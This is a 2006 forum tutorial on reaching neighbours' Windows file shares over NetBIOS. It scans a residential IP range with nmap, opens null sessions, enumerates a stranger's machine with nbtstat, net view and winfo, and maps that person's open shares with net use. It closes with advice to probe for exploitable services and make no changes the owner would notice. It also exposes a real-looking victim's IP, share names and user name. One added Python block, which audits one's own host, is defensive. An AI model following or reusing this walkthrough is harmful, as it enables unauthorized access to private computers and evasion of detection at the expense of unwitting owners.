

CRACKING WEP WITH WINDOWS XP PART 2 CONTINUED 2

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the available shares, but that does not mean there aren't any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the built-in 'net' command, only this time we use 'net use'.
Code:

H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


OK, we don't know the password. There are heaps of password crackers for NetBIOS out there, which I consider more advanced, so they will be covered in the next paper.

We do have the option of connecting via a 'null' session, however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we append "" /U:"" to the end of our command: an empty password, followed by /U:"" for an empty user name.

Try the following:
Code:

H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.


Now try the 'net view' command again to see if we can get a list of the shares. This may or may not be successful, but more often than not it will fail. (If you are successful, read on further down the page to find out what to do next!)

Right, so for the scope of our paper the above target will be considered 'secure' and we move on to easier pickings. Back to nmap!

I find it easier to either use the -oN switch or to right-click the top of the command prompt window and go to Properties. Once there, increase the buffer size to enable you to scroll upwards in the command prompt; otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.
Code:

nmap -sS -P0 -v 86.132.223.0-255 -p 139,445


The results for open ports came back as:
Code:

Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227



OK, so now we have a whole host of my neighbours to connect to!

Let's choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:
Code:

H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name               Type         Status
---------------------------------------------
OFFICE         <00>  UNIQUE      Registered
MSHOME         <00>  GROUP       Registered
OFFICE         <20>  UNIQUE      Registered
MSHOME         <1E>  GROUP       Registered

MAC Address = 00-53-45-00-00-00



OK, so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (the <20> entry). Yep, it is.

So, as we now know, we issue the net view command to get a list of the shares:

Code:

H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name       Type   Used as  Comment

-------------------------------------------------------------------------------
bramford photos  Disk
BrotherD         Print           Brother DCP-340CW USB Printer
BrotherD.2       Print           BRN_759F2E
johns            Disk
PaperPor         Print           PaperPort Black & White Image
PaperPor.2       Print           PaperPort Color Image
Printer          Print           Imprimante Fax Olitec
Printer4         Print           ProgeSOFT PDF Wizard
Printer7         Print           Net-It Now! SE for Pressworks
Printer9         Print           EPSON PictureMate
SharedDocs       Disk
SLAVE (D)        Disk
The command completed successfully.



Look at all those shares.
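An added example, not part of the original tutorial, that parses the two outputs shown above (the nbtstat name table and the net view share listing) into a short exposure summary, so you can check what one of your own hosts advertises over NetBIOS before someone else does. The sample strings are constructed from the output quoted in this paper; the suffix meanings (<00> UNIQUE = computer name, <00> GROUP = workgroup, <20> = Server/file sharing service) are the standard NetBIOS ones.

```python
import re

# Constructed sample: the name-table part of the nbtstat -a output quoted above.
NBTSTAT_SAMPLE = """\
    Name               Type         Status
 ---------------------------------------------
 OFFICE         <00>  UNIQUE      Registered
 MSHOME         <00>  GROUP       Registered
 OFFICE         <20>  UNIQUE      Registered
 MSHOME         <1E>  GROUP       Registered
"""

# Constructed sample: an abridged copy of the 'net view' listing quoted above.
NET_VIEW_SAMPLE = """\
Share name       Type   Used as  Comment
-------------------------------------------------------------------------------
bramford photos  Disk
BrotherD         Print           Brother DCP-340CW USB Printer
johns            Disk
SharedDocs       Disk
SLAVE (D)        Disk
The command completed successfully.
"""

# Name-table row: name, hex suffix in <>, UNIQUE/GROUP, status.
NBT_ROW = re.compile(r"^\s*(\S.*?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)")
# Share row: name, two or more spaces, then the Type column (Disk, Print, IPC).
SHARE_ROW = re.compile(r"^(.+?)\s{2,}(Disk|Print|IPC)\b")

def parse_nbtstat(text):
    """Return [(name, suffix, kind), ...] from nbtstat -a output."""
    matches = (NBT_ROW.match(line) for line in text.splitlines())
    return [(m.group(1).strip(), m.group(2).upper(), m.group(3)) for m in matches if m]

def parse_net_view(text):
    """Return {share_name: type} from 'net view <host>' output."""
    matches = (SHARE_ROW.match(line) for line in text.splitlines())
    return {m.group(1).strip(): m.group(2) for m in matches if m}

def exposure_report(nbt_rows, shares):
    """Summarise what the host advertises. <00> UNIQUE is the computer name,
    <00> GROUP the workgroup, <20> UNIQUE the Server (file sharing) service."""
    return {
        "hostname": next((n for n, s, k in nbt_rows if s == "00" and k == "UNIQUE"), None),
        "workgroups": sorted({n for n, s, k in nbt_rows if s == "00" and k == "GROUP"}),
        "file_sharing": any(s == "20" and k == "UNIQUE" for _, s, k in nbt_rows),
        "disk_shares": sorted(n for n, t in shares.items() if t == "Disk"),
    }
```

Feed it the real output of `nbtstat -a` and `net view` against a machine you administer and the disk_shares list is what an anonymous neighbour would see.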

Now open up a new command prompt and give the following command:
Code:

H:\>winfo 86.132.223.178 -v

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/


SYSTEM INFORMATION:

- OS version: 5.1

DOMAIN INFORMATION:

- Primary domain (legacy): MSHOME
- Account domain: OFFICE
- Primary domain: MSHOME
- DNS name for primary domain:
- Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

- Type: Unknown
- Remark: Remote IPC

* print$

- Type: Disk drive
- Remark: Printer Drivers

* SharedDocs

- Type: Disk drive
- Remark:

* johns

- Type: Disk drive
- Remark:

* PaperPor.2

- Type: Print queue
- Remark: PaperPort Color Image

* Printer7

- Type: Print queue
- Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

- Type: Disk drive
- Remark:

* Printer4

- Type: Print queue
- Remark: ProgeSOFT PDF Wizard

* PaperPor

- Type: Print queue
- Remark: PaperPort Black & White Image

* BrotherD.2

- Type: Print queue
- Remark: BRN_759F2E

* bramford photos

- Type: Disk drive
- Remark:

* Printer9

- Type: Print queue
- Remark: EPSON PictureMate

* Printer

- Type: Print queue
- Remark: Imprimante Fax Olitec

* BrotherD

- Type: Print queue
- Remark: Brother DCP-340CW USB Printer



As you can see, winfo gives us all the shares in an easier-to-read layout. You can put -n at the end of the winfo command to establish a null session if issuing the command without it does not work.

OK, let's pick a share. Hmm, johns looks good.

Let me explain the following command briefly first, though.

"Net use" means we are going to use a network resource.
The "*" means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM, etc. Using the * just tells Windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to, but the outcome is the same.
Code:

H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.


Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to 'My Computer' and you will have a Z drive there, already connected and mapped for you. Click on it and you get to see what is in John's share.

Let’s try another Share:
Code:

H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.


So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other, easier way to do this is to go to Start > Search > Computers and enter the IP address. You will then get a nice graphical view of all the shares.

There are many things that you can do now - some will work, most will not. It is all about research to see what your options are.



To reiterate:
- Find the IP range in use;
- Find the default gateway, which will usually be the IP of the AP;
- Try to connect to the AP’s admin page by typing the IP into a web browser;
- Ping sweep the IP range to see what hosts are up;
- Port scan each individual host to see what services are running;
- Research the active services – what they are, how they work, etc;
- Research how to exploit a service that looks "interesting";
- Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.



The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled, how to connect to one that has MAC address filtering enabled, and to give you a few basic tips and a push in the right direction on the kind of things you can do once you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP. Some have easy-to-exploit flaws, some have flaws that are harder to exploit and some have no flaws at all, but these services are the key to connecting to ANY computer: if there are no services running, you can't connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo did on what has to be the worst forum I have ever seen here with Part One and not only try to pass it off as their own but also thank ME for helping THEM write it!




Original Tutorial by nokia for TheTAZZone-TAZForum

Originally posted on September 2nd, 2006 here

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post...we do not sell, publish, transmit, or have the right to give permission for such...TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network.